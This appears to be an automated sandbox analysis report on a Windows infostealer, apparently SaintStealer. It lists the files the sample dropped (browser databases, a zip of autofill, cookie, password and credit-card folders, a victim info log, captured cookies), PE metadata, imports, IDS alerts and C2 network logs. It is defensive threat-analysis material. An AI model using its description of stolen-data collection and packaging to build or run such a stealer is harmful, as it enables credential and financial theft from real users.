                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                            MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                            SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                            SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                            SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\765iYbgWn9.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                            Category:dropped
                            Size (bytes):155648
                            Entropy (8bit):0.5407252242845243
                            Encrypted:false
                            SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                            MD5:7B955D976803304F2C0505431A0CF1CF
                            SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                            SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                            SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\765iYbgWn9.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                            Category:dropped
                            Size (bytes):51200
                            Entropy (8bit):0.8746135976761988
                            Encrypted:false
                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                            Malicious:false
                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\Desktop\765iYbgWn9.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                            Category:dropped
                            Size (bytes):196608
                            Entropy (8bit):1.1209886597424439
                            Encrypted:false
                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                            MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                            SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                            SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                            SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                            Malicious:false
                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Users\user\Desktop\765iYbgWn9.exe
                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                            Category:dropped
                            Size (bytes):937774
                            Entropy (8bit):7.568306209647945
                            Encrypted:false
                            SSDEEP:12288:NcDv9SSkL9v3Lbzns8Fdcs/VlR7PVWeHMYU0ioMvEAWw0/Pbfk0QfN9ad47QCKel:qDTkRf3znfhVlRuYUyNYhWKeNk
                            MD5:AF4A7615188ACFBC537C50BAD7D55DE7
                            SHA1:741213728277562A9F621D6E8E8121280B875B1A
                            SHA-256:7E4AE1F528BE4BBCA0775BF223EC4AA7BDCDCDB4C7091FCA2E667FE8EE9C11DC
                            SHA-512:49F40316630FF49B8260EB49B189C364A54CFC251D1800412D790DE90D3DBCBBCBDB30C87DF9AE3F621EA28C1759DC878F9501818EF74E8B7BDE873D410075C4
                            Malicious:false
                            Preview:PK........d7.X................Autofill/PK........d7.X................Cookies/PK........d7.X................CreditCards/PK........d7.X................Downloads/PK........d7.X................History/PK........d7.X................Passwords/PK........d7.X...(............screen1.png.PNG........IHDR................C...IDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6.
                            Process:C:\Users\user\Desktop\765iYbgWn9.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):286
                            Entropy (8bit):5.767232012810563
                            Encrypted:false
                            SSDEEP:6:PkU6W3rzxbiEvcKGWlmIrBNuYraqWTfqgqlB1Hwsv7OjPn:cU9bzkEv7BdBNuMWfqnym7O7n
                            MD5:01074DEC455BFC7D979EEA418871413C
                            SHA1:8C2AA1FA48839290016BADCF927FD46EEEBC909A
                            SHA-256:A39398718E40F7B5639D3EC5335EFDF07A8DAC7036DC09A085A81F5C35185CE4
                            SHA-512:110C784EE4F1D57A4C8151F1AD838A1CC2E5BF87C5FE5F9EE81F0E5CC9642480BDB087375AB3F7A069215A076C229A573E70B8807EEA3527093C5C1CEE16774D
                            Malicious:false
                            Preview:.google.com.false./.true.13343559538131870.1P_JAR.2023-10-05-08...google.com.true./.true.13356778738131921.NID.511=orcSInoZBb6Srw0PdPMNeLGKsegfLi-tQnviho5hKJXKDNg0kXIPnfTcuwV5r7RqjT893pWGJF7klKqldBoj4rDJvxfFlgDOCcW9aKDnU9zIlUh2LP0vO8k3uT0gHJD1JvVAclkJnKwZG6hDAl62HrMxNrUeqSR-WF1J-l9YYgE
                            Process:C:\Users\user\Desktop\765iYbgWn9.exe
                            File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                            Category:dropped
                            Size (bytes):910827
                            Entropy (8bit):7.55066923841877
                            Encrypted:false
                            SSDEEP:12288:8cDv9SSkL9v3Lbzns8Fdcs/VlR7PVWeHMYU0ioMvEAWw0/Pbfk0QfN9ad47QCKeM:RDTkRf3znfhVlRuYUyNYhWKM
                            MD5:E592E95E08E5828C7AC352D875815807
                            SHA1:9F55568BEB35EF78FEA091D36D718C30774362C6
                            SHA-256:A60CA122CCB81A5431E422A5134A86F52A8501A958D2C5344FAF120EA3B87B38
                            SHA-512:AF982BC10A5E81A986ABFF87F2686709D674BE53A796F03290DBBAA3DD7E8CB1C01327683182083FCF44A564B584CB16746A16CF3645AF7A4F031C7C414F6D78
                            Malicious:false
                            Preview:.PNG........IHDR................C...IDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6...".....I)..H""..L.$a..I.d&...$.R..m$!..d&..$$.....~...@)..`.&."...d..T..Ak.Z+.V.i...m.i"3). .....q..@...Mf..H"".L2..D...U2..D...m.q$....&.If.../"..$.2...6..$.(".Df..H....8.d&..@f.PJ.6..`...O..Af.0M.}.Ske.^s?..D....@D....IHB..If...R....ls?.R.Dk........d&...... "h.1...m2..IB..
                            Process:C:\Users\user\Desktop\765iYbgWn9.exe
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):22474
                            Entropy (8bit):7.843771809251028
                            Encrypted:false
                            SSDEEP:384:bCZrZimrJZyQ9t3RXsCZrZimrJZyQ9t3RX7C51:bCtRJZyQX3WCtRJZyQX3Q1
                            MD5:60FD18EDC84ACE5821FAD5E9F6770C44
                            SHA1:0F6385A5DF924BA554E7C21F8FE1B49EBB001219
                            SHA-256:1A6F06DDDEB20EE49F61A50B5C447E06C4CA7CCD19DAD16722923986418E4D8E
                            SHA-512:8390AE4ACCEA9C90532ABF8027E61AD66AB6FD329F306FBC776E6125FF9472ABD7CCC48A5B216C073F1FEC91B6B0408130CC61E34504FB1BFC600A5007C0994C
                            Malicious:false
                            Preview:PK........a7.X..+.............BNAGMGSPLO.jpg..I.E!......gEP..p..|7....,../^*r.._[....B.....wr.9n~$|.*.r.\.[&....J..$c..u..@..e.(g..N[..Sko..:...B..T...cz.>:a'.....y..MXW.y...N...(%$.W.....U.x.0.........Yf.[.-..@j.A;.a$a51Gw.].0.n.....q.a..L(X!..wF....E..........l.Ci.!...V....eZ..In..%.%..."}E...+cu.s#.V..qPsa..EDy|.......*..p.]..l&.TR..:|....v..>[...TV.j..|.M...e0....;Y..%.w...d.T.{.U.&...vU.q)S.HdG.....6...R....VE...&P.N....e ....bq_j*.#d..}..l.yF........4E.N..Y.O.6D....|.....v..6j.1>.O...X..W.9x.z....EO.#...i.*_T.Kq....t.../9J........F..u..v..`..v..H.w.|v.4N....^...A.zY4....;7..k|....a...N.....k.W..CeMgQ.~..f....8z...h...'.....n.....q.!.)....PK........a7.X..d)............GAOBCVIQIJ.pdf..I.E!.E...GE.^......r.....B.ha.6...j5....CgC.k.....w#.-U...;....4.KB..dL.......zQo....m...oV2..~...Lm....`}@4..PQ<...L"-...d...j}}....u'............Cn...3h.....g*....V.+..i..o..=...E.d.:......)$..>Kb....x.:)....,.....#..{$.Bni...:Gc.....U...Z..r+...u
                            Process:C:\Users\user\Desktop\765iYbgWn9.exe
                            File Type:Unicode text, UTF-8 text, with CRLF, CR, LF line terminators
                            Category:dropped
                            Size (bytes):705
                            Entropy (8bit):5.3318380531157485
                            Encrypted:false
                            SSDEEP:12:eM3lAQN3oi23w/7QQ84xx6YzGyrJF9qiOlQM7NlVQBQM3aWflIHdAMij01+XaBL2:eaNYv3w/7QWxxVC4mOM7NlVQe8lOAMiR
                            MD5:E7DAE70FF589432E5FA82981B487CCDF
                            SHA1:2A27865A50CEEF94ED2D8FBF768B013FA8D30E03
                            SHA-256:482F7BA9443DA517388946E12AD4324CCB93F9B38AB133500838B251CB181D97
                            SHA-512:61A932AEA48C554C53E5340F366A5EA1B52BFB0F27771E951DF5DF5CF63D2E480F5E72B2CA63A150862B953E57F24C90BE8AEE3D2BC5E0BCACD03CB9C94D1A7B
                            Malicious:false
                            Preview:..- IP Info -....IP: 8.46.123.33..Country: United States..City: New York..Postal: 10000..ISP: Level - A3356..Timezone: -04:00....- PC Info -....Username: user..OS: Microsoft Windows 10 Pro..CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..GPU: Y7SLS (1280, 1024)..HWID: 5205123305035030..Current Language: English (United States)..FileLocation: C:\Users\user\Desktop\765iYbgWn9.exe..Is Elevated: true....- Other Info -....Antivirus: .. - Windows Defender....- Log Info -.....Build:_____....Passwords: ....Cookies: . 2...Wallets: ....Files: . 30...Credit Cards: ....Servers FTP/SSH: ....Discord Tokens: .......Tagged URLs: ....Tagged Cookies: .......Tags Passwords: .....Tags Cookies:
                            Process:C:\Users\user\Desktop\765iYbgWn9.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):32768
                            Entropy (8bit):0.017262956703125623
                            Encrypted:false
                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                            Malicious:false
                            Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                            Entropy (8bit):6.398426891987362
                            TrID:
                            • Win64 Executable GUI (202006/5) 92.65%
                            • Win64 Executable (generic) (12005/4) 5.51%
                            • Generic Win/DOS Executable (2004/3) 0.92%
                            • DOS Executable Generic (2002/1) 0.92%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:765iYbgWn9.exe
                            File size:5'438'976 bytes
                            MD5:0534ab10184891cd61d262bfd79b7b4c
                            SHA1:a13d37959a92bc37f4d3c42eb53d77cc760f448a
                            SHA256:191272e200345dcb0a7a8c8c975a8b07847f07b9d9f0c3af472fdb88092aee0b
                            SHA512:381af090cc87f2f2b8583c28a164f8f2e978c2bdffe3161d37fa30e38c5e026b90ae5f45dd13f9ded8ee207e4694abf2a58256deb8986ec11d802b7578f6be9d
                            SSDEEP:49152:flhBWdxUM546QwStp9BLoQDbN46Nhz8kGAy9x2XdMP3Z+dlihVnp3qd38gT+c1m0:flXWhqntN46uPM3jwHYlDx7ILqTn
                            TLSH:69467B03FA9545EDC0AAC174875A9333EB32B84A0A24B79B5BD44A313F57F606F9C358
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z..R.f.R.f.R.f.[c..@.f...e.[.f...b._.f...c.z.f..ng.D.f..cg.P.f.R.g.w.f.F.b.H.f.R.f.X.f.F.d.S.f.RichR.f.................PE..d..
                            Icon Hash:00928e8e8686b000
                            Entrypoint:0x1403930f0
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x140000000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66A3CC60 [Fri Jul 26 16:18:40 2024 UTC]
                            TLS Callbacks:0x4021ee90, 0x1
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:0
                            File Version Major:6
                            File Version Minor:0
                            Subsystem Version Major:6
                            Subsystem Version Minor:0
                            Import Hash:94e6725f9edd6f43dcf6269a222aa3c5
                            Instruction
                            dec eax
                            sub esp, 28h
                            call 00007F1334842D5Ch
                            dec eax
                            add esp, 28h
                            jmp 00007F1334842597h
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            nop word ptr [eax+eax+00000000h]
                            dec eax
                            sub esp, 10h
                            dec esp
                            mov dword ptr [esp], edx
                            dec esp
                            mov dword ptr [esp+08h], ebx
                            dec ebp
                            xor ebx, ebx
                            dec esp
                            lea edx, dword ptr [esp+18h]
                            dec esp
                            sub edx, eax
                            dec ebp
                            cmovb edx, ebx
                            dec esp
                            mov ebx, dword ptr [00000010h]
                            dec ebp
                            cmp edx, ebx
                            jnc 00007F1334842738h
                            inc cx
                            and edx, 8D4DF000h
                            wait
                            add al, dh
                            Programming Language:
                            • [IMP] VS2008 SP1 build 30729
                            Name | Virtual Address | Virtual Size | Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x50bfd4 | 0x1cc | .rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x517000 | 0x148e0 | .pdata
                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x52c000 | 0x80a4 | .reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x4ff210 | 0x54 | .rdata
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_TLS | 0x4ff400 | 0x28 | .rdata
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x4ff0d0 | 0x140 | .rdata
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IAT | 0x3a6000 | 0x980 | .rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                            .text | 0x1000 | 0x3a48e0 | 0x3a4a00 | 418d52d22d0626c93475b7ef2f69473f | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata | 0x3a6000 | 0x168168 | 0x168200 | 7d024da4e364f95e765edb693d0e0470 | False | 0.3832728165133634 | data | 5.570926269189883 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data | 0x50f000 | 0x70b0 | 0x6200 | 254e2bcebbf320ff6f1ad171ec302c16 | False | 0.4083227040816326 | data | 4.251782437606779 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .pdata | 0x517000 | 0x148e0 | 0x14a00 | e0382aea4f0e950de6c4ac2410d86fe3 | False | 0.48731060606060606 | data | 6.250942251591513 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc | 0x52c000 | 0x80a4 | 0x8200 | d18ff0828687cfa57d6e95da4cab3c38 | False | 0.26580528846153845 | data | 5.455481822699318 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            DLL | Import
                            api-ms-win-core-synch-l1-2-0.dll | WaitOnAddress, WakeByAddressAll, WakeByAddressSingle
                            bcryptprimitives.dll | ProcessPrng
                            ntdll.dll | NtDeviceIoControlFile, NtCreateFile, NtWriteFile, RtlNtStatusToDosError, NtCancelIoFileEx, RtlUnwindEx, RtlPcToFileHeader, NtReadFile, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind
                            kernel32.dll | MultiByteToWideChar, WriteConsoleW, GetModuleHandleA, GetProcAddress, CreateWaitableTimerExW, SetWaitableTimer, Sleep, QueryPerformanceFrequency, GetModuleHandleW, FormatMessageW, lstrlenW, GetEnvironmentVariableW, GetTempPathW, GetFileInformationByHandleEx, GetFullPathNameW, FlushFileBuffers, SetFilePointerEx, QueryPerformanceCounter, CreateDirectoryW, FindFirstFileW, FindClose, GetConsoleMode, SetFileCompletionNotificationModes, CreateIoCompletionPort, GetQueuedCompletionStatusEx, SetHandleInformation, GetEnvironmentStringsW, FreeEnvironmentStringsW, CompareStringOrdinal, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, GetCurrentProcess, DuplicateHandle, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, DeleteProcThreadAttributeList, GetCurrentProcessId, CreateNamedPipeW, CreateThread, ReadFileEx, SleepEx, WriteFileEx, WaitForMultipleObjects, GetOverlappedResult, CreateEventW, CancelIo, ReadFile, ExitProcess, HeapAlloc, GetStdHandle, GetCurrentDirectoryW, WaitForSingleObjectEx, AddVectoredExceptionHandler, CreateMutexA, ReleaseMutex, WideCharToMultiByte, DeleteFileW, CopyFileExW, PostQueuedCompletionStatus, GetFinalPathNameByHandleW, SetLastError, GetSystemInfo, UnhandledExceptionFilter, SwitchToThread, SetFileInformationByHandle, GetModuleFileNameW, CreateFileW, SetUnhandledExceptionFilter, HeapReAlloc, GetExitCodeProcess, WaitForSingleObject, GetSystemTimePreciseAsFileTime, GetTickCount, MapViewOfFile, CreateFileMappingW, FormatMessageA, GetSystemTime, GetSystemTimeAsFileTime, FreeLibrary, SystemTimeToFileTime, GetFileSize, LockFileEx, LocalFree, UnlockFile, HeapDestroy, HeapCompact, LoadLibraryW, DeleteFileA, CreateFileA, FlushViewOfFile, OutputDebugStringW, GetFileAttributesExW, GetFileAttributesA, GetDiskFreeSpaceA, GetTempPathA, HeapSize, HeapValidate, UnmapViewOfFile, CreateMutexW, UnlockFileEx, SetEndOfFile, GetFullPathNameA, SetFilePointer, LockFile, OutputDebugStringA, GetDiskFreeSpaceW, WriteFile, HeapCreate, AreFileApisANSI, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, GetCurrentThreadId, TerminateProcess, IsProcessorFeaturePresent, GetLastError, InitializeSListHead, GetCurrentThread, CloseHandle, IsDebuggerPresent, GetFileInformationByHandle, HeapFree, GetProcessHeap, EncodePointer, RaiseException, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryA, SetThreadStackGuarantee, FindNextFileW, LoadLibraryExW
                            ws2_32.dll | WSAIoctl, ioctlsocket, socket, getsockname, WSAGetLastError, WSASend, shutdown, getpeername, send, WSACleanup, getsockopt, WSASocketW, closesocket, select, bind, listen, accept, setsockopt, freeaddrinfo, getaddrinfo, recv, connect, WSAStartup
                            rstrtmgr.dll | RmRegisterResources, RmGetList, RmStartSession
                            user32.dll | EnumDisplaySettingsExW, EnumDisplayMonitors, GetMonitorInfoW
                            bcrypt.dll | BCryptGenRandom
                            advapi32.dll | RegQueryValueExW, CheckTokenMembership, RegOpenKeyExW, AllocateAndInitializeSid, RegCloseKey, SystemFunction036, FreeSid
                            secur32.dll | FreeCredentialsHandle, DeleteSecurityContext, AcquireCredentialsHandleA, ApplyControlToken, EncryptMessage, DecryptMessage, QueryContextAttributesW, InitializeSecurityContextW, AcceptSecurityContext, FreeContextBuffer
                            crypt32.dll | CertVerifyCertificateChainPolicy, CertFreeCertificateContext, CertEnumCertificatesInStore, CertAddCertificateContextToStore, CertFreeCertificateChain, CertGetCertificateChain, CertDuplicateStore, CertOpenStore, CertDuplicateCertificateContext, CertDuplicateCertificateChain, CertCloseStore, CryptUnprotectData
                            oleaut32.dll | SysAllocStringLen, SafeArrayDestroy, VariantClear, SafeArrayAccessData, SysFreeString, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayUnaccessData
                            ole32.dll | CoSetProxyBlanket, CoInitializeSecurity, CoInitializeEx, CoCreateInstance
                            gdi32.dll | GetDeviceCaps, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, DeleteDC, GetDIBits, GetObjectW, DeleteObject, CreateDCW, StretchBlt
                            api-ms-win-crt-math-l1-1-0.dll | log, ceil, exp2f, _dclass, pow, truncf, __setusermatherr, roundf
                            api-ms-win-crt-string-l1-1-0.dll | strcspn, strlen, strcmp, strcpy_s, wcsncmp, strncmp
                            api-ms-win-crt-heap-l1-1-0.dll | free, _msize, realloc, calloc, malloc, _set_new_mode
                            api-ms-win-crt-utility-l1-1-0.dll | _rotl64, qsort
                            api-ms-win-crt-time-l1-1-0.dll | _localtime64_s
                            api-ms-win-crt-runtime-l1-1-0.dll | _configure_narrow_argv, _seh_filter_exe, _endthreadex, _get_initial_narrow_environment, _initterm, _initialize_onexit_table, _beginthreadex, _initterm_e, exit, _exit, terminate, abort, __p___argc, __p___argv, _cexit, _c_exit, _register_onexit_function, _register_thread_local_exe_atexit_callback, _crt_atexit, _initialize_narrow_environment, _set_app_type
                            api-ms-win-crt-stdio-l1-1-0.dll | __p__commode, _set_fmode
                            api-ms-win-crt-locale-l1-1-0.dll | _configthreadlocale
                            Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
                            2024-07-29T07:38:58.167052+0200 | TCP | 2039009 | ET MALWARE Win32/SaintStealer CnC Response | 443 | 60284 | 149.154.167.220 | 192.168.2.8
                            2024-07-29T07:38:17.826882+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49706 | 13.85.23.86 | 192.168.2.8
                            2024-07-29T07:38:45.004637+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 60283 | 13.85.23.86 | 192.168.2.8
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Jul 29, 2024 07:38:00.864394903 CEST | 49705 | 80 | 192.168.2.8 | 195.201.57.90
                            Jul 29, 2024 07:38:00.869271040 CEST | 80 | 49705 | 195.201.57.90 | 192.168.2.8
                            Jul 29, 2024 07:38:00.869348049 CEST | 49705 | 80 | 192.168.2.8 | 195.201.57.90
                            Jul 29, 2024 07:38:00.870285988 CEST | 49705 | 80 | 192.168.2.8 | 195.201.57.90
                            Jul 29, 2024 07:38:00.875129938 CEST | 80 | 49705 | 195.201.57.90 | 192.168.2.8
                            Jul 29, 2024 07:38:01.523041964 CEST | 80 | 49705 | 195.201.57.90 | 192.168.2.8
                            Jul 29, 2024 07:38:01.523504972 CEST | 49705 | 80 | 192.168.2.8 | 195.201.57.90
                            Jul 29, 2024 07:38:01.529794931 CEST | 80 | 49705 | 195.201.57.90 | 192.168.2.8
                            Jul 29, 2024 07:38:01.529903889 CEST | 49705 | 80 | 192.168.2.8 | 195.201.57.90
                            Jul 29, 2024 07:38:36.651216984 CEST | 49708 | 80 | 192.168.2.8 | 195.201.57.90
                            Jul 29, 2024 07:38:36.658169985 CEST | 80 | 49708 | 195.201.57.90 | 192.168.2.8
                            Jul 29, 2024 07:38:36.658260107 CEST | 49708 | 80 | 192.168.2.8 | 195.201.57.90
                            Jul 29, 2024 07:38:36.658557892 CEST | 49708 | 80 | 192.168.2.8 | 195.201.57.90
                            Jul 29, 2024 07:38:36.663522959 CEST | 80 | 49708 | 195.201.57.90 | 192.168.2.8
                            Jul 29, 2024 07:38:37.310988903 CEST | 80 | 49708 | 195.201.57.90 | 192.168.2.8
                            Jul 29, 2024 07:38:37.313565016 CEST | 49708 | 80 | 192.168.2.8 | 195.201.57.90
                            Jul 29, 2024 07:38:37.318941116 CEST | 80 | 49708 | 195.201.57.90 | 192.168.2.8
                            Jul 29, 2024 07:38:37.319013119 CEST | 49708 | 80 | 192.168.2.8 | 195.201.57.90
                            Jul 29, 2024 07:38:56.109680891 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.109728098 CEST | 443 | 60284 | 149.154.167.220 | 192.168.2.8
                            Jul 29, 2024 07:38:56.109816074 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.129791975 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
                            Jul 29, 2024 07:38:56.129829884 CEST | 443 | 60284 | 149.154.167.220 | 192.168.2.8
                            Jul 29, 2024 07:38:56.778392076 CEST | 443 | 60284 | 149.154.167.220 | 192.168.2.8
                            Jul 29, 2024 07:38:56.778650045 CEST | 60284 | 443 | 192.168.2.8 | 149.154.167.220
